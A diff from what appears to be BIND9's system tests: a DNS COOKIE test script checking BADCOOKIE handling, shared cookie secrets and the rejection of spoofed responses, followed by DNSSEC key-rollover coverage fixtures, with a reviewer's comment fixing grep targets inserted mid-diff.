($n)" +ret=0 +$DIG $DIGOPTS +qr +header-only +cookie version.bind txt ch @10.53.0.1 > dig.out.test$n +grep COOKIE: dig.out.test$n > 
/dev/null || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking COOKIE token is returned to empty COOKIE option ($n)" +ret=0 +$DIG $DIGOPTS +cookie version.bind txt ch @10.53.0.1 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking COOKIE is not returned when answer-cookie is false ($n)" +ret=0 +$DIG $DIGOPTS +cookie version.bind txt ch @10.53.0.7 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size without COOKIE ($n)" +ret=0 +$DIG $DIGOPTS large.example txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size without valid COOKIE ($n)" +ret=0 +$DIG $DIGOPTS +cookie large.example txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n || ret=1 +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size with COOKIE ($n)" +ret=0 +$DIG $DIGOPTS +cookie large.example txt @10.53.0.1 > dig.out.test$n.l +cookie=`getcookie dig.out.test$n.l` +$DIG $DIGOPTS +qr +cookie=$cookie large.example txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n && ret=1 +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking response size with COOKIE recursive ($n)" +ret=0 +$DIG $DIGOPTS +qr 
+cookie=$cookie large.xxx txt @10.53.0.1 +ignore > dig.out.test$n +havetc dig.out.test$n && ret=1 +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking COOKIE is learnt for TCP retry ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie large.example txt @10.53.0.1 > dig.out.test$n +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 3 ]; then ret=1; fi +checkfull=`getcookie dig.out.test$n | fullcookie` +if [ $checkfull != 1 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking for COOKIE value in adb ($n)" +ret=0 +rndc_dumpdb ns1 +grep "10.53.0.2.*\[cookie=" ns1/named_dump.db.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking require-server-cookie default (no) ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie +nobadcookie soa @10.53.0.1 > dig.out.test$n +grep BADCOOKIE dig.out.test$n > /dev/null && ret=1 +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 2 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking require-server-cookie yes ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie +nobadcookie soa @10.53.0.3 > dig.out.test$n +grep "flags: qr[^;]* aa[ ;]" dig.out.test$n > /dev/null && ret=1 +grep "flags: qr[^;]* ad[ ;]" dig.out.test$n > /dev/null && ret=1 +grep BADCOOKIE dig.out.test$n > /dev/null || ret=1 +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 2 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking require-server-cookie yes with rate-limit ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie +nobadcookie soa example @10.53.0.8 > dig.out.test$n +grep "flags: qr[^;]* ad[ ;]" dig.out.test$n > /dev/null && ret=1 +grep BADCOOKIE 
dig.out.test$n > /dev/null || ret=1 +linecount=`getcookie dig.out.test$n | wc -l` +if [ $linecount != 2 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "send undersized cookie ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=000000 soa @10.53.0.1 > dig.out.test$n || ret=1 +grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "send oversized for named cookie ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=${cookie}00 soa @10.53.0.1 > dig.out.test$n || ret=1 +grep "COOKIE: [a-f0-9]* (good)" dig.out.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "send oversized for named cookie with server requiring a good cookie ($n)" +ret=0 +$DIG $DIGOPTS +qr +cookie=${cookie}00 soa @10.53.0.3 > dig.out.test$n || ret=1 +grep "COOKIE: [a-f0-9]* (good)" dig.out.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# +# Test shared cookie-secret support. +# +# NS4 has cookie-secret "569d36a6cc27d6bf55502183302ba352"; +# +# NS5 has cookie-secret "569d36a6cc27d6bf55502183302ba352"; +# NS5 has cookie-secret "6b300e27a0db46d4b046e4189790fa7d"; (alternate) +# +# NS6 has cookie-secret "6b300e27a0db46d4b046e4189790fa7d"; +# +# Server cookies from NS4 are accepted by NS5 and not NS6 +# Server cookies from NS5 are accepted by NS4 and not NS6 +# Server cookies from NS6 are accepted by NS5 and not NS4 +# +# Force local address so that the client's address is the same to all servers. +# + +n=`expr $n + 1` +echo_i "get NS4 cookie for cross server checking ($n)" +ret=0 +$DIG $DIGOPTS +cookie -b 10.53.0.4 soa . 
@10.53.0.4 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +ns4cookie=`getcookie dig.out.test$n` +test -n "$ns4cookie" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "get NS5 cookie for cross server checking ($n)" +ret=0 +$DIG $DIGOPTS +cookie -b 10.53.0.4 soa . @10.53.0.5 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +ns5cookie=`getcookie dig.out.test$n` +test -n "$ns5cookie" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "get NS6 cookie for cross server checking ($n)" +ret=0 +$DIG $DIGOPTS +cookie -b 10.53.0.4 soa . @10.53.0.6 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +ns6cookie=`getcookie dig.out.test$n` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS4 cookie on NS5 (expect success) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns4cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.5 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS4 cookie on NS6 (expect badcookie) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns4cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.6 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: BADCOOKIE," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS5 cookie on NS4 (expect success) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns5cookie -b 10.53.0.4 +nobadcookie soa . 
@10.53.0.4 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS5 cookie on NS6 (expect badcookie) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns5cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.6 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: BADCOOKIE," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS6 cookie on NS4 (expect badcookie) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns6cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.4 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: BADCOOKIE," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test NS6 cookie on NS5 (expect success) ($n)" +ret=0 +$DIG $DIGOPTS +cookie=$ns6cookie -b 10.53.0.4 +nobadcookie soa . @10.53.0.5 > dig.out.test$n +grep "; COOKIE:.*(good)" dig.out.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that test server is correctly configured ($n)" +ret=0 +pat="; COOKIE: ................................ 
(good)" +#UDP +$DIG $DIGOPTS @10.53.0.9 +notcp tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.1 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.1 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.1 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +notcp tcponly.tld > dig.out.test$n.2 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.2 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null || ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +notcp nocookie.tld > dig.out.test$n.3 +grep "status: NOERROR" dig.out.test$n.3 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.3 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.3 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.3 > /dev/null || ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +notcp withtsig.tld > dig.out.test$n.4 +grep "status: NOERROR" dig.out.test$n.4 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.4 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.4 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.4 > /dev/null || ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.4 > /dev/null || ret=1 + +#TCP +$DIG $DIGOPTS @10.53.0.9 +tcp tld > dig.out.test$n.5 +grep "status: NOERROR" dig.out.test$n.5 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.5 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.5 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.5 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +tcp tcponly.tld > dig.out.test$n.6 +grep "status: NOERROR" dig.out.test$n.6 > /dev/null || ret=1 
+grep "$pat" dig.out.test$n.6 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.6 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.6 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +tcp nocookie.tld > dig.out.test$n.7 +grep "status: NOERROR" dig.out.test$n.7 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.7 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.7 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.7 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +tcp withtsig.tld > dig.out.test$n.8 +grep "status: NOERROR" dig.out.test$n.8 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.8 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.8 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.8 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.8 > /dev/null && ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that spoofed response is dropped when we have a server cookie ($n)" +ret=0 +msg="missing expected cookie from" +pat='10\.53\.0\.9 .*\[cookie=................................\] \[ttl' +# prime EDNS COOKIE state +$DIG $DIGOPTS @10.53.0.1 tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +rndc_dumpdb ns1 +grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 +# spoofed response contains 10.53.0.10 +nextpart ns1/named.run >/dev/null +$DIG $DIGOPTS @10.53.0.1 tcponly.tld > dig.out.test$n.2 +wait_for_log 5 "$msg" ns1/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that gracefully handle server 
disabling DNS COOKIE we have a server cookie ($n)" +ret=0 +msg="missing expected cookie from" +pat='10\.53\.0\.9 .*\[cookie=................................\] \[ttl' +# prime EDNS COOKIE state +$DIG $DIGOPTS @10.53.0.1 tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +rndc_dumpdb ns1 +grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 +# check the disabled server response +nextpart ns1/named.run >/dev/null +$DIG $DIGOPTS @10.53.0.1 nocookie.tld > dig.out.test$n.2 +wait_for_log 5 "$msg" ns1/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that spoofed response with a TSIG is dropped when we have a server cookie ($n)" +ret=0 +pat='10\.53\.0\.9 .*\[cookie=................................\] \[ttl' +# prime EDNS COOKIE state +$DIG $DIGOPTS @10.53.0.1 tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +rndc_dumpdb ns1 +grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 +# spoofed response contains 10.53.0.10 +nextpart ns1/named.run >/dev/null +$DIG $DIGOPTS @10.53.0.1 withtsig.tld > dig.out.test$n.2 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null && ret=1 +nextpart ns1/named.run > named.run.test$n +count=$(grep -c ') [0-9][0-9]* NOERROR 0' named.run.test$n) +test $count -eq 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $PYTHON -c ' +import dns.version, sys; +if dns.version.MAJOR > 1: sys.exit(0); +if dns.version.MAJOR == 1 and dns.version.MINOR >= 16: sys.exit(0); +sys.exit(1)' +then + n=`expr $n + 1` + echo_i "check that TSIG test server is correctly 
configured ($n)" + ret=0 + pat="; COOKIE: ................................ (good)" + key=hmac-sha256:foo:aaaaaaaaaaaa + #UDP + $DIG $DIGOPTS @10.53.0.10 -y $key +notcp tsig. > dig.out.test$n.1 + grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 + grep "$pat" dig.out.test$n.1 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.1 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.1 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +notcp tcponly.tsig > dig.out.test$n.2 + grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 + grep "; COOKIE:" dig.out.test$n.2 > /dev/null && ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null || ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +notcp nocookie.tsig > dig.out.test$n.3 + grep "status: NOERROR" dig.out.test$n.3 > /dev/null || ret=1 + grep "; COOKIE:" dig.out.test$n.3 > /dev/null && ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.3 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.3 > /dev/null || ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + #TCP + $DIG $DIGOPTS @10.53.0.10 -y $key +tcp tsig. 
> dig.out.test$n.5 + grep "status: NOERROR" dig.out.test$n.5 > /dev/null || ret=1 + grep "$pat" dig.out.test$n.5 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.5 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.5 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +tcp tcponly.tsig > dig.out.test$n.6 + grep "status: NOERROR" dig.out.test$n.6 > /dev/null || ret=1 + grep "$pat" dig.out.test$n.6 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.6 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.6 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +tcp nocookie.tsig > dig.out.test$n.7 + grep "status: NOERROR" dig.out.test$n.7 > /dev/null || ret=1 + grep "; COOKIE:" dig.out.test$n.7 > /dev/null && ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.7 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.7 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + n=`expr $n + 1` + echo_i "check that missing COOKIE with a valid TSIG signed response does not trigger TCP fallback ($n)" + ret=0 + pat='10\.53\.0\.10 .*\[cookie=................................\] \[ttl' + # prime EDNS COOKIE state + $DIG $DIGOPTS @10.53.0.1 tsig. 
> dig.out.test$n.1 + grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 + rndc_dumpdb ns1 + grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 + # check the disabled server response + nextpart ns1/named.run >/dev/null + $DIG $DIGOPTS @10.53.0.1 nocookie.tsig > dig.out.test$n.2 + grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null || ret=1 + nextpart ns1/named.run > named.run.test$n + count=$(grep -c ') [0-9][0-9]* NOERROR 0' named.run.test$n) + test $count -eq 2 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/coverage/01-ksk-inactive/README b/bin/tests/system/coverage/01-ksk-inactive/README new file mode 100644 index 0000000..8102593 --- /dev/null +++ b/bin/tests/system/coverage/01-ksk-inactive/README @@ -0,0 +1,10 @@ +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +ERROR: After 2012-31-Jul (20:59:14): + Inactive: example.com/007/45435 (KSK) +No KSK's are active + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/01-ksk-inactive/expect b/bin/tests/system/coverage/01-ksk-inactive/expect new file mode 100644 index 0000000..3d342b1 --- /dev/null +++ b/bin/tests/system/coverage/01-ksk-inactive/expect @@ -0,0 +1,6 @@ +args="-d 1h -m 2h" +warn=0 +error=1 +ok=1 +retcode=1 +match="No KSK's are active" diff --git a/bin/tests/system/coverage/02-zsk-inactive/README b/bin/tests/system/coverage/02-zsk-inactive/README new file mode 100644 index 0000000..5d3fed1 --- /dev/null +++ b/bin/tests/system/coverage/02-zsk-inactive/README 
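Review bot: In cookie/tests.sh, under "check that test server is correctly configured", the `;; TSIG PSEUDOSECTION:` checks after the `.2`, `.3`, `.5`, `.6` and `.7` queries all grep `dig.out.test$n.1`, so they re-test the first response rather than the one just written. The `TSIG.*NOERROR` checks in the dnspython-gated "TSIG test server" block repeat the same copy-paste slip for `.2`, `.3`, `.5`, `.6` and `.7`. Those assertions cannot fail on the response they are presumably meant to cover, which weakens the fixture validation that the spoofed-response tests rely on. Each grep should read the file produced by the preceding `$DIG` call, as the `.4` and `.8` cases already do. Separately, the "get NS6 cookie" step lacks the `test -n "$ns6cookie" || ret=1` guard that the NS4 and NS5 steps have.

```shell
# … unchanged: "check that test server is correctly configured", tld query (.1) …
# after the +notcp tcponly.tld query:
grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.2 > /dev/null && ret=1
# after the +notcp nocookie.tld query:
grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.3 > /dev/null && ret=1
# … unchanged: +notcp withtsig.tld (.4) …
# after the +tcp tld, tcponly.tld and nocookie.tld queries respectively:
grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.5 > /dev/null && ret=1
grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.6 > /dev/null && ret=1
grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.7 > /dev/null && ret=1
# … unchanged: +tcp withtsig.tld (.8) and the three spoofed-response tests …
# "check that TSIG test server is correctly configured", after each query:
  grep 'TSIG.*NOERROR' dig.out.test$n.2 > /dev/null || ret=1
  grep 'TSIG.*NOERROR' dig.out.test$n.3 > /dev/null || ret=1
  grep 'TSIG.*NOERROR' dig.out.test$n.5 > /dev/null || ret=1
  grep 'TSIG.*NOERROR' dig.out.test$n.6 > /dev/null || ret=1
  grep 'TSIG.*NOERROR' dig.out.test$n.7 > /dev/null || ret=1
```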
@@ -0,0 +1,10 @@
+This set includes one ZSK rollover. The first ZSK is deactivated
+prior to its replacement being activated. Tool output should resemble:
+
+Checking KSK events for zone example.com, algorithm 7:
+OK
+
+Checking ZSK events for zone example.com, algorithm 7:
+ERROR: After 2012-05-Dec (20:39:32):
+ Inactive: example.com/005/08376 (ZSK)
+No ZSK's are active
diff --git a/bin/tests/system/coverage/02-zsk-inactive/expect b/bin/tests/system/coverage/02-zsk-inactive/expect
new file mode 100644
index 0000000..a905b58
--- /dev/null
+++ b/bin/tests/system/coverage/02-zsk-inactive/expect
@@ -0,0 +1,6 @@
+args="-d 1h -m 2h"
+warn=0
+error=1
+ok=1
+retcode=1
+match="No ZSK's are active"
diff --git a/bin/tests/system/coverage/03-ksk-unpublished/README b/bin/tests/system/coverage/03-ksk-unpublished/README
new file mode 100644
index 0000000..7d8a301
--- /dev/null
+++ b/bin/tests/system/coverage/03-ksk-unpublished/README
@@ -0,0 +1,10 @@
+This set contains one KSK rollover. The KSK is unpublished before its
+successor is published. Tool output should resemble:
+
+Checking KSK events for zone example.com, algorithm 7:
+ERROR: After 2012-06-Oct (21:07:57):
+ Delete: example.com/007/23040 (KSK)
+No KSK's are published
+
+Checking ZSK events for zone example.com, algorithm 7:
+OK
diff --git a/bin/tests/system/coverage/03-ksk-unpublished/expect b/bin/tests/system/coverage/03-ksk-unpublished/expect
new file mode 100644
index 0000000..07bbff1
--- /dev/null
+++ b/bin/tests/system/coverage/03-ksk-unpublished/expect
@@ -0,0 +1,8 @@
+args="-d 1h -m 2h"
+warn=1
+error=1
+ok=1
+retcode=1
+match="WARNING: Key .* (KSK) is scheduled for
+deletion before inactivation
+No KSK's are published"
diff --git a/bin/tests/system/coverage/04-zsk-unpublished/README b/bin/tests/system/coverage/04-zsk-unpublished/README
new file mode 100644
index 0000000..5077abf
--- /dev/null
+++ b/bin/tests/system/coverage/04-zsk-unpublished/README
@@ -0,0 +1,10 @@
+This set contains one ZSK rollover. The ZSK is unpublished before its
+successor is published. Tool output should resemble:
+
+Checking KSK events for zone example.com, algorithm 7:
+OK
+
+Checking ZSK events for zone example.com, algorithm 7:
+ERROR: After 2012-06-Oct (21:13:45):
+ Delete: example.com/007/25967 (ZSK)
+No ZSK's are published
diff --git a/bin/tests/system/coverage/04-zsk-unpublished/expect b/bin/tests/system/coverage/04-zsk-unpublished/expect
new file mode 100644
index 0000000..450ec24
--- /dev/null
+++ b/bin/tests/system/coverage/04-zsk-unpublished/expect
@@ -0,0 +1,8 @@
+args="-d 1h -m 2h"
+warn=1
+error=1
+ok=1
+retcode=1
+match="WARNING: Key .* (ZSK) is scheduled for
+deletion before inactivation
+No ZSK's are published"
diff --git a/bin/tests/system/coverage/05-ksk-unpub-active/README b/bin/tests/system/coverage/05-ksk-unpub-active/README
new file mode 100644
index 0000000..119c1b2
--- /dev/null
+++ b/bin/tests/system/coverage/05-ksk-unpub-active/README
@@ -0,0 +1,12 @@
+This set includes one KSK rollover. The first KSK is deleted
+and its successor published prior to the first KSK being deactivated
+and its successor activated. Tool output should resemble:
+
+Checking KSK events for zone example.com, algorithm 7:
+ERROR: After 2012-05-Dec (21:22:19):
+ Delete: example.com/007/06219 (KSK)
+ Publish: example.com/007/20559 (KSK)
+No KSK's are both active and published
+
+Checking ZSK events for zone example.com, algorithm 7:
+OK
diff --git a/bin/tests/system/coverage/05-ksk-unpub-active/expect b/bin/tests/system/coverage/05-ksk-unpub-active/expect
new file mode 100644
index 0000000..2edfa0e
--- /dev/null
+++ b/bin/tests/system/coverage/05-ksk-unpub-active/expect
@@ -0,0 +1,8 @@
+args="-d 1h -m 2h"
+warn=1
+error=1
+ok=1
+retcode=1
+match="WARNING: Key .* (KSK) is scheduled for
+deletion before inactivation
+No KSK's are both active and published"
diff --git a/bin/tests/system/coverage/06-zsk-unpub-active/README b/bin/tests/system/coverage/06-zsk-unpub-active/README
new file mode 100644
index 0000000..84833f8
--- /dev/null
+++ b/bin/tests/system/coverage/06-zsk-unpub-active/README
@@ -0,0 +1,12 @@
+This set includes one KSK rollover. The first KSK is deleted
+and its successor published prior to the first KSK being deactivated
+and its successor activated. Tool output should resemble:
+
+Checking KSK events for zone example.com, algorithm 7:
+OK
+
+Checking ZSK events for zone example.com, algorithm 7:
+ERROR: After 2012-05-Dec (20:44:18):
+ Delete: example.com/007/26369 (ZSK)
+ Publish: example.com/007/21029 (ZSK)
+No ZSK's are both active and published
diff --git a/bin/tests/system/coverage/06-zsk-unpub-active/expect b/bin/tests/system/coverage/06-zsk-unpub-active/expect
new file mode 100644
index 0000000..0ef5b15
--- /dev/null
+++ b/bin/tests/system/coverage/06-zsk-unpub-active/expect
@@ -0,0 +1,8 @@
+args="-d 1h -m 2h"
+warn=1
+error=1
+ok=1
+retcode=1
+match="WARNING: Key .* (ZSK) is scheduled for
+deletion before inactivation
+No ZSK's are both active and published"
diff --git a/bin/tests/system/coverage/07-ksk-ttl/README b/bin/tests/system/coverage/07-ksk-ttl/README
new file mode 100644
index 0000000..2659099
--- /dev/null
